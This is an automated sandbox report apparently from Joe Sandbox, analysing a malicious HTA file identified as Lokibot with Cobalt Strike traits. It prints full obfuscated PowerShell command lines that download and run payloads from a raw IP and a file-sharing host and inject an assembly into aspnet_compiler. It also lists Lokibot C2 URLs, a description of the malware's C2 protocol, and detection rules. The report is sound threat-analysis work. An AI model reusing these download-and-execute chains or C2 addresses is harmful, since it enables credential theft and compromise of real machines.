Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta

Overview

General Information

Sample name:kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
Analysis ID:1556631
MD5:43f15554d66e784d988aa2da3ed2a136
SHA1:6d0fb362a8aa62a046e25435e6a525e2ca61492d
SHA256:5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected aPLib compressed binary
Compiles C# or VB.Net code
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 1264 cmdline: mshta.exe "C:\Users\user\Desktop\kissmegoodthingwhichgivemebestthignswithgirluaremy.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 3160 cmdline: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 2364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 6972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 5560 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 5948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • aspnet_compiler.exe (PID: 3092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
kissmegoodthingwhichgivemebestthignswithgirluaremy.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            9.2.powershell.exe.660c250.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              9.2.powershell.exe.660c250.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              9.2.powershell.exe.660c250.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              9.2.powershell.exe.660c250.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x133fc:$a2: last_compatible_version
              9.2.powershell.exe.660c250.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x123ff:$des3: 68 03 66 00 00
              • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 24 entries
              SourceRuleDescriptionAuthorStrings
              amsi32_5536.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtT
                Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = 